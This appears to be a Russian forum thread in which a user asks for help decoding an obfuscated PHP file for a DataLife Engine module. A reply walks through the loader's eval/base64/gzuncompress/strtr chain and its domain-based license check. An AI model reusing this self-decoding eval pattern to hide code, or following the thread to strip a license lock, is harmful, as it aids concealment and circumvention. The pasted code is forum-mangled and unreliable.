$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000 =2760;eval(gzuncompress(base64_decode('eNplj1ePgkA AhP8MCbsR44KIEMKDvbv29nKhLEVp7lKUX3+au9xdcpl5msx8y XAYIYRfQoabpCQGHMb4KxB4avFQL/0gJKBe5/C7+DZ0PZIxwP1MBRFJMtT/xTLSFKi/iN9Lw6vy2E6ilBLGgGUyosgfDrEThwCW0YwClxLT+YtQVBUK/AU9H3IkYlMLJotO2T+TqraeZ7fT0hsovro/MCvuTlsNOx/TVRrOku396Azddk8qrqPmbmPwAt/p9vqD4Wg8mc7miyVerTfb3f5wPJ0vpmU7xPX84HoLozhJ75Rle VE+nhUSpabcUtqqVmvwEEKdFGYIfg9B/RPMh18q')));return;?>
8AHAQLp+fBZQRbProjVENNicbmr4x5cYJ9lZ8wFBY/ayHq49lSpZSuRkOG9x5+unP80xkf5opDtsM7Lf3T16Rz2/KBApP5YOrb5c2TrYuFSoVulxPwwFUYg6Xd5qi006go4HNGpcCA Z1g/ptCZybOxOc09z0sXzOtwZbdYHE71+QmWaHwf0oY0oZjgNepH9J Qu1t4DCOe8/F8rIUG5QksAaf7M0omOZL0rXGA2sReUE8xhFLd/pXzJiE44a20d1bfLHprm8FzJfrvDLdukHAmdQSkhxo9dJgkbNI oi09yzN4kr5euXT1ifbxbslN0eiwRL3y8/nCCj6ZklAkLrNQrE7D2ATGe8gUsTDS6ag8O/TMSJGUNfVq/OvUD43U9PDSEDYq/g4K+TmjRnXgx3myA2YABCbtzHrv8JAW82f0jSs5Hinr5LS8d7Q 6bTyaOM9ivKqc6Jn17HvhAMIA98iv0gN/Z81yyQNP0cNmcbOTmqKffdhLuebTQlRjGUNgqhbslQivh7V9V3 k+KIbjixgFe1KjrMCEjKjSu5a1tLEf/ewKfn57MKEtokr735bnLB/s14jKOSSH5gAPjKVBkqbtqH8LglfPU/2S8tQd+ZKPNcK87nJpFRMjnalVfTKUx3zF3X7CN59r8fhLoUDP BrEu80W8xycJctPC21GPQKa/ana1yZ==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

eLWAux

19.05.2010, 18:47

Просьба! Заливайте код на тексто-обменники типа paste.ly, pastebin.com
Потому что форум видоизменяет ваш текст

Помогите, у самого некак не выходит.

<?php // This file is protected by copyright law and provided under license. Reverse engineering of this file is strictly prohibited.
$OOO0O0O00=__FILE__;$O00O00O00=__LINE__;$OO00O0000 =2760;eval(gzuncompress(base64_decode('eNplj1ePgkA AhP8MCbsR44KIEMKDvbv29nKhLEVp7lKUX3+au9xdcpl5msx8y XAYIYRfQoabpCQGHMb4KxB4avFQL/0gJKBe5/C7+DZ0PZIxwP1MBRFJMtT/xTLSFKi/iN9Lw6vy2E6ilBLGgGUyosgfDrEThwCW0YwClxLT+YtQVBUK/AU9H3IkYlMLJotO2T+TqraeZ7fT0hsovro/MCvuTlsNOx/TVRrOku396Azddk8qrqPmbmPwAt/p9vqD4Wg8mc7miyVerTfb3f5wPJ0vpmU7xPX84HoLozhJ75Rle VE+nhUSpabcUtqqVmvwEEKdFGYIfg9B/RPMh18q')));return;?>..

Это лицензия для сайта antibit.ru, потому я только алгоритм покажу.

сперва выполняется этот код:
gzuncompress(base64_decode('eNplj1ePgkAAhP8MCbsR44 KIEMKDvbv29nKhLEVp7lKUX3+au9xdcpl5msx8yXAYIYRfQoab pCQGHMb4KxB4avFQL/0gJKBe5/C7+DZ0PZIxwP1MBRFJMtT/xTLSFKi/iN9Lw6vy2E6ilBLGgGUyosgfDrEThwCW0YwClxLT+YtQVBUK/AU9H3IkYlMLJotO2T+TqraeZ7fT0hsovro/MCvuTlsNOx/TVRrOku396Azddk8qrqPmbmPwAt/p9vqD4Wg8mc7miyVerTfb3f5wPJ0vpmU7xPX84HoLozhJ75Rle VE+nhUSpabcUtqqVmvwEEKdFGYIfg9B/RPMh18q'))

там мы увидем, нечто:
$F = fopen(__FILE__,'rb');
while(--__LINE__)
fgets($F,1024); // пропускаем 1кб текста

fgets($F,4096); // читаем все что осталось
$code = gzuncompress(
base64_decode(
strtr(
fread($O000O0O00,688), // разбиваем на блоки
'Z0yx4m1Oa9iIMAwDYez+QLtkXNgE6h8UVsbnBJ5/cuHrPplKoSqWdFf7C2vjG3TR=',
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789+/'
)
)
);
eval($OO00O00O0);

Далее остальной код разделяем на два блока:
1) 8AHAQLp+fBZQRbProjVENNicbmr4x5cYJ9lZ8wFBY/ayHq49lSpZSuRkOG9x5+unP80xkf5opDtsM7Lf3T16Rz2/KBApP5YOrb5c2TrYuFSoVulxPwwFUYg6Xd5qi006go4HNGpcCA Z1g/ptCZybOxOc09z0sXzOtwZbdYHE71+QmWaHwf0oY0oZjgNepH9J Qu1t4DCOe8/F8rIUG5QksAaf7M0omOZL0rXGA2sReUE8xhFLd/pXzJiE44a20d1bfLHprm8FzJfrvDLdukHAmdQSkhxo9dJgkbNI oi09yzN4kr5euXT1ifbxbslN0eiwRL3y8/nCCj6ZklAkLrNQrE7D2ATGe8gUsTDS6ag8O/TMSJGUNfVq/OvUD43U9PDSEDYq/g4K+TmjRnXgx3myA2YABCbtzHrv8JAW82f0jSs5Hinr5LS8d7Q 6bTyaOM9ivKqc6Jn17HvhAMIA98iv0gN/Z81yyQNP0cNmcbOTmqKffdhLuebTQlRjGUNgqhbslQivh7V9V3 k+KIbjixgFe1KjrMCEjKjSu5a1tLEf/ewKfn57MKEtokr735bnLB/s14jKOSSH5gAPjKVBkqbtqH8LglfPU/2S8tQd+ZKPNcK87nJpFRMjnalVfTKUx3zF3X7CN59r8fhLoUDP BrEu80W8xycJctPC21GPQKa/ana1yZ==

2) 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

После дешифрока первого кода, получаем:
if(!function_exists('gzuncompress'))
die('The PHP zlib module is required to run...........');
if( ( (isset($HTTP_SERVER_VARS['SERVER_NAME'])) && (!eregi('((.*\.)?antibit\.ru)',$HTTP_SERVER_VARS['SERVER_NAME'])) ) ||
( (isset($_SERVER['HTTP_HOST'])) && (!eregi('((.*\.)?antibit\.ru)',$_SERVER['HTTP_HOST'])))
)
die('Данная лицензия распространяется для домена antibit.ru');
$OO00O00O0 = ereg_replace('__FILE__',"'".$OOO0O0O00."'",
gzuncompress(
base64_decode(
strtr(
read($O000O0O00,$OO00O0000),
'Z0yx4m1Oa9iIMAwDYez+QLtkXNgE6h8UVsbnBJ5/cuHrPplKoSqWdFf7C2vjG3TR=',
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789+/')
)
)
);
fclose($O000O0O00);
eval($OO00O00O0);
if(!function_exists('gzuncompress'))
die('The PHP zlib module is requ..............);

if (
((isset($HTTP_SERVER_VARS['SERVER_NAME'])) && (!eregi('((.*\.)?antibit\.ru)',$HTTP_SERVER_VARS['SERVER_NAME']))) ||
((isset($_SERVER['HTTP_HOST'])) && (!eregi('((.*\.)?antibit\.ru)',$_SERVER['HTTP_HOST'])))
)
die('Данная лицензия распространяется для домена antibit.ru');
$OO00O00O0 = ereg_replace('__FILE__',"'".$OOO0O0O00."'",
gzuncompress(
base64_decode(
strtr(
fread($O000O0O00,$OO00O0000),
'Z0yx4m1Oa9iIMAwDYez+QLtkXNgE6h8UVsbnBJ5/cuHrPplKoSqWdFf7C2vjG3TR=',
'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw xyz0123456789+/'
)
)
)
);
fclose($O000O0O00);
eval($OO00O00O0);

И второй (только шапка):
/*
================================================== ===
MOD "Files v.3.1" for DataLife Engine - by Snake
url = http://mynokia.su/
email - igramnet@gmail.com
Форум поддержки модуля http://www.fmlife.net/
================================================== ===
DataLife Engine - by SoftNews Media Group
-----------------------------------------------------
http://dle-news.ru/
-----------------------------------------------------
Copyright (c) 2004,2008 SoftNews Media Group
================================================== ===
Данный код защищен авторскими правами
================================================== ===
Проверен на безопасность командой White Team
-----------------------------------------------------
Сайт команды http://www.white-team.net
================================================== ===
*/